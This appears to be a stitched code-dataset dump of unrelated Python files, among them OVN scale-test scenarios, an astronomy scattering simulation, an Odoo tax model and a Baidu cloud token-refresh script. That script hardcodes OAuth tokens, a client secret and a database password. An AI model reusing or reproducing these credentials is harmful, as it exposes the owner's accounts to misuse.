result_and_no_error = 'result' in msg and 'error' not in msg
error_and_no_result = 'error' in msg and 'result' not in msg
return (self._chk_protocol(msg) and
isinstance(msg.get('id', None), (six.string_types, int)) and
(result_and_no_error or error_and_no_result))
def is_nil_id_error_response(self, msg):
error_and_no_result = 'error' in msg and 'result' not in msg
return (self._chk_protocol(msg) and
error_and_no_result and
'id' in msg and
msg['id'] is None)
def is_batch_request(self, msg_list):
if not msg_list:
return False
for msg in msg_list:
if not self.is_request(msg) and not self.is_notification(msg):
return False
return True
def is_batch_response(self, msg_list):
if not msg_list:
return False
for msg in msg_list:
if not self.is_response(msg):
return False
return True
class RpcErrors(object):
parse_error = {'code': -32700, 'message': 'Parse error'}
invalid_request = {'code': -32600, 'message': 'Invalid Request'}
method_not_found = {'code': -32601, 'message': 'Method not found'}
invalid_params = {'code': -32602, 'message': 'Invalid params'}
internal_error = {'code': -32603, 'message': 'Internal error'}
server_error = {'code': -32000, 'message': 'Server error'}
_promote = {
-32700: ParseError,
-32600: InvalidRequest,
-32601: MethodNotFound,
-32602: InvalidParams,
-32603: InternalError,
-32000: ServerError,
}
@classmethod
def error_to_exception(cls, error):
code = error.get('code', 0)
message = error.get('message', '')
data = error.get('data', '')
exception_cls = cls._promote.get(code, UnspecifiedPeerError)
return exception_cls(code, message, data)
|
mpl-2.0
| 1,107,113,176,544,598,700
| 31.682432
| 79
| 0.565226
| false
| 3.882022
| false
| false
| false
|
openvswitch/ovn-scale-test
|
rally_ovs/plugins/ovs/scenarios/ovn.py
|
1
|
25304
|
# Copyright 2016 Ebay Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from rally_ovs.plugins.ovs import scenario
from rally.task import atomic
from rally.common import logging
from rally import exceptions
from rally_ovs.plugins.ovs import ovnclients
from rally_ovs.plugins.ovs import utils
import random
import netaddr
from io import StringIO
LOG = logging.getLogger(__name__)
class OvnScenario(ovnclients.OvnClientMixin, scenario.OvsScenario):
RESOURCE_NAME_FORMAT = "lswitch_XXXXXX_XXXXXX"
def __init__(self, context=None):
super(OvnScenario, self).__init__(context)
self._init_conns(self.context)
def _init_conns(self, context):
self._ssh_conns = {}
if not context:
return
for sandbox in context["sandboxes"]:
sb_name = sandbox["name"]
farm = sandbox["farm"]
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
ovs_ssh.set_sandbox(sb_name, self.install_method,
sandbox["host_container"])
ovs_ssh.enable_batch_mode()
self._ssh_conns[sb_name] = ovs_ssh
def _get_conn(self, sb_name):
return self._ssh_conns[sb_name]
def _flush_conns(self, cmds=[]):
for _, ovs_ssh in self._ssh_conns.items():
for cmd in cmds:
ovs_ssh.run(cmd)
ovs_ssh.flush()
'''
return: [{"name": "lswitch_xxxx_xxxxx", "cidr": netaddr.IPNetwork}, ...]
'''
@atomic.action_timer("ovn.create_lswitch")
def _create_lswitches(self, lswitch_create_args, num_switches=-1):
print("create lswitch")
return super(OvnScenario, self)._create_lswitches(lswitch_create_args, num_switches)
@atomic.optional_action_timer("ovn.list_lswitch")
def _list_lswitches(self):
print("list lswitch")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
return ovn_nbctl.lswitch_list()
@atomic.action_timer("ovn.delete_lswitch")
def _delete_lswitch(self, lswitches):
print("delete lswitch")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lswitch in lswitches:
ovn_nbctl.lswitch_del(lswitch["name"])
ovn_nbctl.flush()
def _get_or_create_lswitch(self, lswitch_create_args=None):
pass
@atomic.action_timer("ovn.create_lport")
def _create_lports(self, lswitch, lport_create_args = [], lport_amount=1,
lport_ip_shift = 1):
LOG.info("create %d lports on lswitch %s" % \
(lport_amount, lswitch["name"]))
self.RESOURCE_NAME_FORMAT = "lpXXXXXX_XXXXXX"
batch = lport_create_args.get("batch", lport_amount)
port_security = lport_create_args.get("port_security", True)
LOG.info("Create lports method: %s" % self.install_method)
network_cidr = lswitch.get("cidr", None)
ip_addrs = None
if network_cidr:
end_ip = network_cidr.ip + lport_amount + lport_ip_shift
if not end_ip in network_cidr:
message = _("Network %s's size is not big enough for %d lports.")
raise exceptions.InvalidConfigException(
message % (network_cidr, lport_amount))
ip_addrs = netaddr.iter_iprange(network_cidr.ip + lport_ip_shift,
network_cidr.last)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
base_mac = [i[:2] for i in self.task["uuid"].split('-')]
base_mac[0] = str(hex(int(base_mac[0], 16) & 254))
base_mac[3:] = ['00']*3
flush_count = batch
lports = []
for i in range(lport_amount):
ip = str(next(ip_addrs)) if ip_addrs else ""
if len(ip):
name = "lp_%s" % ip
else:
name = self.generate_random_name()
mac = utils.get_random_mac(base_mac)
ip_mask = '{}/{}'.format(ip, network_cidr.prefixlen)
lport = ovn_nbctl.lswitch_port_add(lswitch["name"], name, mac,
ip_mask)
ovn_nbctl.lport_set_addresses(name, [mac, ip])
if port_security:
ovn_nbctl.lport_set_port_security(name, mac)
lports.append(lport)
flush_count -= 1
if flush_count < 1:
ovn_nbctl.flush()
flush_count = batch
ovn_nbctl.flush() # ensure all commands be run
ovn_nbctl.enable_batch_mode(False)
return lports
@atomic.action_timer("ovn.delete_lport")
def _delete_lport(self, lports):
print("delete lport")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lport in lports:
ovn_nbctl.lport_del(lport["name"])
ovn_nbctl.flush()
@atomic.action_timer("ovn.list_lports")
def _list_lports(self, lswitches):
print("list lports")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lswitch in lswitches:
LOG.info("list lports on lswitch %s" % lswitch["name"])
ovn_nbctl.lport_list(lswitch["name"])
@atomic.optional_action_timer("ovn.create_acl")
def _create_acl(self, lswitch, lports, acl_create_args, acls_per_port):
sw = lswitch["name"]
LOG.info("create %d ACLs on lswitch %s" % (acls_per_port, sw))
direction = acl_create_args.get("direction", "to-lport")
priority = acl_create_args.get("priority", 1000)
action = acl_create_args.get("action", "allow")
address_set = acl_create_args.get("address_set", "")
'''
match template: {
"direction" : "<inport/outport>",
"lport" : "<swicth port>",
"address_set" : "<address_set id>"
"l4_port" : "<l4 port number>",
}
'''
match_template = acl_create_args.get("match",
"%(direction)s == %(lport)s && \
ip4 && udp && udp.src == %(l4_port)s")
if direction == "from-lport":
p = "inport"
else:
p = "outport"
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lport in lports:
for i in range(acls_per_port):
match = match_template % { 'direction' : p,
'lport' : lport["name"],
'address_set' : address_set,
'l4_port' : 100 + i }
ovn_nbctl.acl_add(sw, direction, priority, match, action)
ovn_nbctl.flush()
@atomic.action_timer("ovn.list_acl")
def _list_acl(self, lswitches):
LOG.info("list ACLs")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lswitch in lswitches:
LOG.info("list ACLs on lswitch %s" % lswitch["name"])
ovn_nbctl.acl_list(lswitch["name"])
@atomic.action_timer("ovn.delete_all_acls")
def _delete_all_acls_in_lswitches(self, lswitches):
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(True)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lswitch in lswitches:
self._delete_acls(lswitch)
ovn_nbctl.flush()
def _delete_acls(self, lswitch, direction=None, priority=None,
match=None, flush=False):
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
LOG.info("delete ACLs on lswitch %s" % lswitch["name"])
ovn_nbctl.acl_del(lswitch["name"], direction, priority, match)
if flush:
ovn_nbctl.flush()
@atomic.action_timer("ovn_network.create_routers")
def _create_routers(self, router_create_args):
LOG.info("Create Logical routers")
return super(OvnScenario, self)._create_routers(router_create_args)
@atomic.action_timer("ovn_network.delete_routers")
def _delete_routers(self):
LOG.info("Delete Logical routers")
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for lrouter in ovn_nbctl.lrouter_list():
ovn_nbctl.lrouter_del(lrouter["name"])
@atomic.action_timer("ovn_network.connect_network_to_router")
def _connect_networks_to_routers(self, lnetworks, lrouters, networks_per_router):
super(OvnScenario, self)._connect_networks_to_routers(lnetworks,
lrouters,
networks_per_router)
@atomic.action_timer("ovn_network.create_phynet")
def _create_phynet(self, lswitches, physnet, batch):
LOG.info("Create phynet method: %s" % self.install_method)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode()
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
flush_count = batch
for lswitch in lswitches:
network = lswitch["name"]
port = "provnet-%s" % network
ovn_nbctl.lswitch_port_add(network, port)
ovn_nbctl.lport_set_addresses(port, ["unknown"])
ovn_nbctl.lport_set_type(port, "localnet")
ovn_nbctl.lport_set_options(port, "network_name=%s" % physnet)
flush_count -= 1
if flush_count < 1:
ovn_nbctl.flush()
flush_count = batch
ovn_nbctl.flush()
# NOTE(huikang): num_networks overides the "amount" in network_create_args
def _create_networks(self, network_create_args, num_networks=-1):
physnet = network_create_args.get("physical_network", None)
lswitches = self._create_lswitches(network_create_args, num_networks)
batch = network_create_args.get("batch", len(lswitches))
if physnet != None:
self._create_phynet(lswitches, physnet, batch)
return lswitches
def _bind_ports_and_wait(self, lports, sandboxes, port_bind_args):
port_bind_args = port_bind_args or {}
wait_up = port_bind_args.get("wait_up", False)
# "wait_sync" takes effect only if wait_up is True.
# By default we wait for all HVs catching up with the change.
wait_sync = port_bind_args.get("wait_sync", "hv")
if wait_sync.lower() not in ['hv', 'sb', 'none']:
raise exceptions.InvalidConfigException(_(
"Unknown value for wait_sync: %s. "
"Only 'hv', 'sb' and 'none' are allowed.") % wait_sync)
LOG.info("Bind lports method: %s" % self.install_method)
self._bind_ports(lports, sandboxes, port_bind_args)
if wait_up:
self._wait_up_port(lports, wait_sync)
def _bind_ovs_internal_vm(self, lport, sandbox, ovs_ssh):
port_name = lport["name"]
port_mac = lport["mac"]
port_ip = lport["ip"]
# TODO: some containers don't have ethtool installed
if not sandbox["host_container"]:
# Disable tx offloading on the port
ovs_ssh.run('ethtool -K {p} tx off &> /dev/null'.format(p=port_name))
ovs_ssh.run('ip netns add {p}'.format(p=port_name))
ovs_ssh.run('ip link set {p} netns {p}'.format(p=port_name))
ovs_ssh.run('ip netns exec {p} ip link set {p} address {m}'.format(
p=port_name, m=port_mac)
)
ovs_ssh.run('ip netns exec {p} ip addr add {ip} dev {p}'.format(
p=port_name, ip=port_ip)
)
ovs_ssh.run('ip netns exec {p} ip link set {p} up'.format(
p=port_name)
)
# Add route for multicast traffic
ovs_ssh.run('ip netns exec {p} ip route add 224/4 dev {p}'.format(
p=port_name)
)
# Store the port in the context so we can use its information later
# on or at cleanup
self.context["ovs-internal-ports"][port_name] = (lport, sandbox)
def _delete_ovs_internal_vm(self, port_name, ovs_ssh, ovs_vsctl):
ovs_vsctl.del_port(port_name)
ovs_ssh.run('ip netns del {p}'.format(p=port_name))
def _flush_ovs_internal_ports(self, sandbox):
stdout = StringIO()
host_container = sandbox["host_container"]
sb_name = sandbox["name"]
farm = sandbox["farm"]
ovs_vsctl = self.farm_clients(farm, "ovs-vsctl")
ovs_vsctl.set_sandbox(sandbox, self.install_method, host_container)
ovs_vsctl.run("find interface type=internal", ["--bare", "--columns", "name"], stdout=stdout)
output = stdout.getvalue()
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
ovs_ssh.set_sandbox(sb_name, self.install_method, host_container)
for name in list(filter(None, output.splitlines())):
if "lp" not in name:
continue
self._delete_ovs_internal_vm(name, ovs_ssh, ovs_vsctl)
def _cleanup_ovs_internal_ports(self, sandboxes):
conns = {}
for sandbox in sandboxes:
sb_name = sandbox["name"]
farm = sandbox["farm"]
host_container = sandbox["host_container"]
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
ovs_ssh.set_sandbox(sb_name, self.install_method,
host_container)
ovs_ssh.enable_batch_mode()
ovs_vsctl = self.farm_clients(farm, "ovs-vsctl")
ovs_vsctl.set_sandbox(sandbox, self.install_method,
host_container)
ovs_vsctl.enable_batch_mode()
conns[sb_name] = (ovs_ssh, ovs_vsctl)
for _, (lport, sandbox) in self.context["ovs-internal-ports"].items():
sb_name = sandbox["name"]
(ovs_ssh, ovs_vsctl) = conns[sb_name]
self._delete_ovs_internal_vm(lport["name"], ovs_ssh, ovs_vsctl)
for _, (ovs_ssh, ovs_vsctl) in conns.items():
ovs_vsctl.flush()
ovs_ssh.flush()
@atomic.action_timer("ovn_network.bind_port")
def _bind_ports(self, lports, sandboxes, port_bind_args):
internal = port_bind_args.get("internal", False)
sandbox_num = len(sandboxes)
lport_num = len(lports)
lport_per_sandbox = int((lport_num + sandbox_num - 1) / sandbox_num)
if (len(lports) < len(sandboxes)):
for lport in lports:
sandbox_data = random.choice(sandboxes)
farm = sandbox_data['farm']
sandbox = sandbox_data['name']
ovs_vsctl = self.farm_clients(farm, "ovs-vsctl")
ovs_vsctl.set_sandbox(sandbox, self.install_method,
sandbox_data['host_container'])
ovs_vsctl.enable_batch_mode()
port_name = lport["name"]
port_mac = lport["mac"]
port_ip = lport["ip"]
LOG.info("bind %s to %s on %s" % (port_name, sandbox, farm))
ovs_vsctl.add_port('br-int', port_name, internal=internal)
ovs_vsctl.db_set('Interface', port_name,
('external_ids', {"iface-id": port_name,
"iface-status": "active"}),
('admin_state', 'up'))
ovs_vsctl.flush()
# If it's an internal port create a "fake vm"
if internal:
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
self._bind_ovs_internal_vm(lport, sandbox_data, ovs_ssh)
ovs_ssh.flush()
else:
j = 0
for i in range(0, len(lports), lport_per_sandbox):
lport_slice = lports[i:i+lport_per_sandbox]
sandbox = sandboxes[j]["name"]
farm = sandboxes[j]["farm"]
ovs_vsctl = self.farm_clients(farm, "ovs-vsctl")
ovs_vsctl.set_sandbox(sandbox, self.install_method,
sandboxes[j]["host_container"])
ovs_vsctl.enable_batch_mode()
for index, lport in enumerate(lport_slice):
port_name = lport["name"]
LOG.info("bind %s to %s on %s" % (port_name, sandbox, farm))
ovs_vsctl.add_port('br-int', port_name, internal=internal)
ovs_vsctl.db_set('Interface', port_name,
('external_ids', {"iface-id":port_name,
"iface-status":"active"}),
('admin_state', 'up'))
if index % 400 == 0:
ovs_vsctl.flush()
ovs_vsctl.flush()
# If it's an internal port create a "fake vm"
if internal:
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
ovs_ssh.enable_batch_mode()
for index, lport in enumerate(lport_slice):
self._bind_ovs_internal_vm(lport, sandboxes[j], ovs_ssh)
if index % 200 == 0:
ovs_ssh.flush()
ovs_ssh.flush()
j += 1
@atomic.action_timer("ovn_network.wait_port_up")
def _wait_up_port(self, lports, wait_sync):
LOG.info("wait port up. sync: %s" % wait_sync)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(True)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for index, lport in enumerate(lports):
ovn_nbctl.wait_until('Logical_Switch_Port', lport["name"], ('up', 'true'))
if index % 400 == 0:
ovn_nbctl.flush()
if wait_sync != "none":
ovn_nbctl.sync(wait_sync)
@atomic.action_timer("ovn_network.list_oflow_count_for_sandboxes")
def _list_oflow_count_for_sandboxes(self, sandboxes,
sandbox_args):
oflow_data = []
for sandbox in sandboxes:
sandbox_name = sandbox["name"]
farm = sandbox["farm"]
host_container = sandbox_name["host_container"]
ovs_ofctl = self.farm_clients(farm, "ovs-ofctl")
ovs_ofctl.set_sandbox(sandbox_name, self.install_method,
host_container)
bridge = sandbox_args.get('bridge', 'br-int')
lflow_count = ovs_ofctl.dump_flows(bridge)
LOG.debug('openflow count on %s is %s' % (sandbox_name, lflow_count))
oflow_data.append([sandbox_name, lflow_count])
# Leverage additive plot as each sandbox has just one openflow count.
additive_oflow_data = {
"title": "Openflow count on each sandbox in StackedArea",
"description": "Openflow count on each sandbox",
"chart_plugin": "StackedArea", "data": oflow_data
}
self.add_output(additive_oflow_data)
def _create_address_set(self, set_name, address_list):
LOG.info("create %s address_set [%s]" % (set_name, address_list))
name = "name=\"" + set_name + "\""
addr_list="\"" + address_list + "\""
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.create("Address_Set", name, ('addresses', addr_list))
ovn_nbctl.flush()
def _address_set_add_addrs(self, set_name, address_list):
LOG.info("add [%s] to address_set %s" % (address_list, set_name))
name = "\"" + set_name + "\""
addr_list="\"" + address_list + "\""
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.add("Address_Set", name, ('addresses', ' ', addr_list))
ovn_nbctl.flush()
def _address_set_remove_addrs(self, set_name, address_list):
LOG.info("remove [%s] from address_set %s" % (address_list, set_name))
name = "\"" + set_name + "\""
addr_list="\"" + address_list + "\""
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.remove("Address_Set", name, ('addresses', ' ', addr_list))
ovn_nbctl.flush()
def _list_address_set(self):
stdout = StringIO()
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
ovn_nbctl.run("list address_set", ["--bare", "--columns", "name"], stdout=stdout)
ovn_nbctl.flush()
output = stdout.getvalue()
return output.splitlines()
def _remove_address_set(self, set_name):
LOG.info("remove %s address_set" % set_name)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.destroy("Address_Set", set_name)
ovn_nbctl.flush()
def _get_address_set(self, set_name):
LOG.info("get %s address_set" % set_name)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
return ovn_nbctl.get("Address_Set", set_name, 'addresses')
|
apache-2.0
| 7,730,396,663,554,991,000
| 41.743243
| 101
| 0.561769
| false
| 3.651371
| false
| false
| false
|
krosenfeld/scatterbrane
|
docs/_code/time_variability.py
|
1
|
3849
|
'''
Generate a time series incorporating the motion of the screen across the source.
This script may take a long time to run. I suggest you read through it first and
adjust the num_samples variable to check out its performance.
'''
import numpy as np
from scipy.ndimage import imread
import time
import matplotlib.pyplot as plt
from palettable.cubehelix import jim_special_16
cmap = jim_special_16.mpl_colormap
plt.rcParams['image.origin'] = 'lower'
plt.rcParams['patch.edgecolor'] = 'white'
plt.rcParams['lines.linewidth'] = 2
from scatterbrane import Brane,utilities
# set up logger
import logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
# import our source image and covert it to gray scale
src_file = 'source_images/nh_01_stern_05_pluto_hazenew2.square.jpg'
rgb = imread(src_file)[::-1]
I = (np.array([0.2989,0.5870,0.1140])[np.newaxis,np.newaxis,:]*rgb).sum(axis=-1)
I *= np.pi/I.sum()
# make up some scale for our image.
write_figs = False
wavelength=1e-3
FOV = 90.
dx = FOV/I.shape[0]
# initialize the scattering screen @ 0.87mm
b = Brane(I,dx,wavelength=0.87e-3,nphi=(2**12,2**14),anisotropy=1,pa=None,r_inner=50,live_dangerously=True)
# estimate the time resolution of our simulation assuming some screen velocity.
screen_velocity = 200. #km/s
fs = screen_velocity/(b.screen_dx*b.ips) # Hz
num_samples = b.nphi[1]/b.ips - b.nx # try num_samples = 100 for testing porpoises.
logger.info('Number of samples: {0:g}'.format(num_samples))
logger.info('Sampling interval: {0:g}s'.format(1./fs))
logger.info('Time coverage: {0:g} days'.format(num_samples/fs/(3600.*24.)))
# generate the screen (this takes a while)
logger.info('generating screen...')
tic = time.time()
b.generatePhases()
logger.info('took {0:g}s'.format(time.time()-tic))
# generate time series (this takes a while)
logger.info('generating time series...')
fluxes = []
frames = []
tic = time.time()
for i in range(num_samples):
# update source image to include a sinusoidal flux modulation
b.setModel(I*(1. - 0.4*np.sin(2*np.pi*i/(2*num_samples))), dx) # comment out to speedup
b.scatter(move_pix=i*b.ips)
fluxes.append(b.iss.sum())
frames.append(b.iss)
logger.info('took {0:g}s'.format(time.time()-tic))
# 1962.92s
# make figures
fig_file = '../_static/time_variability/'
extent=b.dx*b.nx//2*np.array([1,-1,-1,1])
plt.figure()
plt.subplot(121)
isrc_smooth = utilities.smoothImage(b.isrc,b.dx,2.*b.dx)
plt.imshow(isrc_smooth,extent=extent,cmap=cmap)
plt.xlabel('$\Delta\\alpha$ [$\mu$as]'); plt.ylabel('$\Delta\delta$ [$\mu$as]')
plt.subplot(122)
iss_smooth = utilities.smoothImage(b.iss,b.dx,2.*b.dx)
plt.imshow(iss_smooth,extent=extent,cmap=cmap)
plt.gca().set_yticklabels(10*['']); plt.gca().set_xticklabels(10*[''])
if write_figs: plt.savefig(fig_file+'/iss.png',bbox_inches='tight')
plt.figure()
t = 1./fs*np.arange(len(fluxes))/3600.
plt.plot(t,fluxes,color='#377EB8')
plt.xlabel('time [hr]')
plt.ylabel('flux [Jy]')
plt.xlim([0,t.max()])
plt.grid()
if write_figs: plt.savefig(fig_file+'/flux.png',bbox_inches='tight')
# and a movie
import matplotlib.animation as animation
i = 0
def updatefig(*args):
global i
i = (i + 1) % num_samples
im.set_array(utilities.smoothImage(frames[i],b.dx,2*b.dx))
return im
plt.show()
fig = plt.figure(figsize=(8,6))
im = plt.imshow(utilities.smoothImage(frames[0],b.dx,2*b.dx), cmap=cmap, animated=True,
extent=extent, interpolation=None)
plt.xlabel('$\Delta\\alpha$ [$\mu$as]')
plt.ylabel('$\Delta\delta$ [$\mu$as]')
ani = animation.FuncAnimation(fig, updatefig, interval=50, blit=False, frames=int(1000))
Writer = animation.writers['ffmpeg']
writer = Writer(fps=15, metadata=dict(artist='Katherine Rosenfeld'), bitrate=1800)
if write_figs:
logger.info('writing movie!')
ani.save('mov.mp4',writer=writer)
plt.close()
else:
plt.show()
|
mit
| -1,363,312,966,128,243,000
| 32.763158
| 107
| 0.704858
| false
| 2.777056
| false
| false
| false
|
matrixorz/justpic
|
justpic/etc/pcstool.py
|
1
|
1581
|
{"expires_in":2592000,"refresh_token":"22.ca7aeff542c491ee0c9de8a3010a9de4.315360000.1724417263.3875775130-1056026","access_token":"21.8bdf77c07a392aea779d571a24903d45.2592000.1411649263.3875775130-1056026","session_secret":"8ddef6d7ab2a0b36034c53a46bcbb6c0","session_key":"9mnRfHBbgiKJcCaPaY1v1Qjo2\/VryC6ZM+X+sorRrQ6C8hWQeryRbEXcZmR2RyHGaDPD8yD8\/LGm+jHuvnVhx6fV0IO5EEJGmQ==","scope":"basic netdisk"}
# "refresh_token":"22.ca7aeff542c491ee0c9de8a3010a9de4.315360000.1724417263.3875775130-1056026"
# "access_token":"21.8bdf77c07a392aea779d571a24903d45.2592000.1411649263.3875775130-1056026"
client_id='oA8jMPTjA8yrtaGsc2i5HHdx'
client_secret='kas6A0XFr7uArRnXL4Da0GCvyxRqRiWw'
#get the foever token ?
import MySQLdb
db = MySQLdb.connect("localhost","david","david","picturetoken")
cursor=db.cursor()
cursor.execute("select * from picturetoken")
rs=cursor.fetchone()
# cursor.close
print rs
print rs[2]
refresh_token=rs[2]
from baidupcs.tools import get_new_access_token
response=get_new_access_token(refresh_token,client_id,client_secret)
access_token=response.json()['access_token']
refresh_token=response.json()['refresh_token']
print access_token
print refresh_token
print type(access_token)
# cursor=db.cursor()
# print
# add_salary = """insert into picturetoken(access_token, refresh_token) values(%s,%s)""" ,(access_token,refresh_token)
# print add_salary
cursor.execute("delete from picturetoken")
cursor.execute( """insert into picturetoken(access_token, refresh_token) values(%s,%s)""" ,(str(access_token),str(refresh_token)))
cursor.close()
db.commit()
db.close()
|
mit
| 5,203,383,678,631,350,000
| 41.72973
| 402
| 0.794434
| false
| 2.478056
| false
| true
| false
|
surajsinghbisht054/Information_Gathering_Python_Web_Scraping_Scripts
|
html_link_extractor/link_re.py
|
1
|
1087
|
#!/usr/bin/python
##################################################
######## Please Don't Remove Author Name #########
############### Thanks ###########################
##################################################
#
#
__author__='''
Suraj Singh
surajsinghbisht054@gmail.com
https://bitforestinfo.blogspot.in/
'''
# Import Module
import urllib.request, urllib.error, urllib.parse
import sys
import re
if len(sys.argv)==1:
print("[*] Please Provide Domain Name:\n Usages: python link_re.py www.examplesite.com\n")
sys.exit(0)
# Retrieve Html Data From Url
def get_html(url):
try:
page = urllib.request.urlopen(url).read()
except Exception as e:
print("[Error Found] ",e)
page=None
return page
html_data=get_html(sys.argv[1])
# Condition
if html_data:
pattern = re.compile('(<a .*?>)') # First, Find all <a > tag
a_tag_captured = pattern.findall(html_data)
for i in a_tag_captured: # Second, Now Find href tag in all tag
href=re.search('href=.*', i[1:-1])
if href: # If Tag Found
print(href.group().split(' ')[0]) # Print Tag
|
apache-2.0
| -3,389,522,426,765,960,000
| 24.880952
| 91
| 0.563017
| false
| 3.159884
| false
| false
| false
|
open-synergy/opnsynid-l10n-indonesia
|
l10n_id_taxform_retur_pajak_masukan/models/retur_pajak_masukan.py
|
1
|
2380
|
# -*- coding: utf-8 -*-
# Copyright 2017 OpenSynergy Indonesia
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from openerp import models, fields, api
class ReturPajakMasukan(models.Model):
_name = "l10n_id.retur_pajak_masukan"
_description = "Retur Pajak Masukan"
_inherit = ["l10n_id.faktur_pajak_common"]
@api.model
def _get_faktur_pajak_type(self):
return self.env.ref(
"l10n_id_taxform_retur_pajak_masukan.fp_type_rp_masukan")
name = fields.Char(
string="# Retur Pajak Masukan",
)
enofa_nomor_dokumen = fields.Char(
string="NOMOR_DOKUMEN_RETUR",
)
enofa_tanggal_dokumen = fields.Char(
string="TANGGAL_RETUR",
)
enofa_masa_pajak = fields.Char(
string="MASA_PAJAK_RETUR",
)
enofa_tahun_pajak = fields.Char(
string="TAHUN_PAJAK_RETUR",
)
enofa_jumlah_dpp = fields.Char(
string="NILAI_RETUR_DPP",
)
enofa_jumlah_ppn = fields.Char(
string="NILAI_RETUR_PPN",
)
enofa_jumlah_ppnbm = fields.Char(
string="NILAI_RETUR_PPNBM",
)
enofa_nomor_dokumen_balik = fields.Char(
string="NOMOR_FAKTUR",
)
enofa_tanggal_dokumen_balik = fields.Char(
string="TANGGAL_FAKTUR",
)
reference_id = fields.Many2one(
string="Doc. Reference",
comodel_name="account.move",
)
reference_ids = fields.Many2many(
string="Doc. References",
comodel_name="account.move",
relation="rel_rp_masukan_2_move",
column1="rp_masukan_id",
column2="move_id",
)
all_reference_ids = fields.Many2many(
string="Doc. References",
comodel_name="account.move",
relation="rel_rp_masukan_2_all_move",
compute="_compute_all_reference",
column1="rp_masukan_id",
column2="move_id",
store=True,
)
reverse_id = fields.Many2one(
string="Reverse From",
comodel_name="l10n_id.faktur_pajak_masukan",
)
substitute_id = fields.Many2one(
string="Substitute For",
comodel_name="l10n_id.retur_pajak_masukan",
)
@api.onchange("reference_id")
def onchange_reference_id(self):
if self.reference_id:
self.name = self.reference_id.name
|
agpl-3.0
| 1,572,841,041,619,940,400
| 27.382716
| 69
| 0.584454
| false
| 2.941904
| false
| false
| false
|
artopping/nyu-python
|
course1/assignment_6/rf_random_walk.py
|
1
|
2312
|
#!/usr/bin/env python3
import random
import sys
import math
def get_random_direction():
direction = ""
probability = random.random()
if probability < 0.25:
direction = "west"
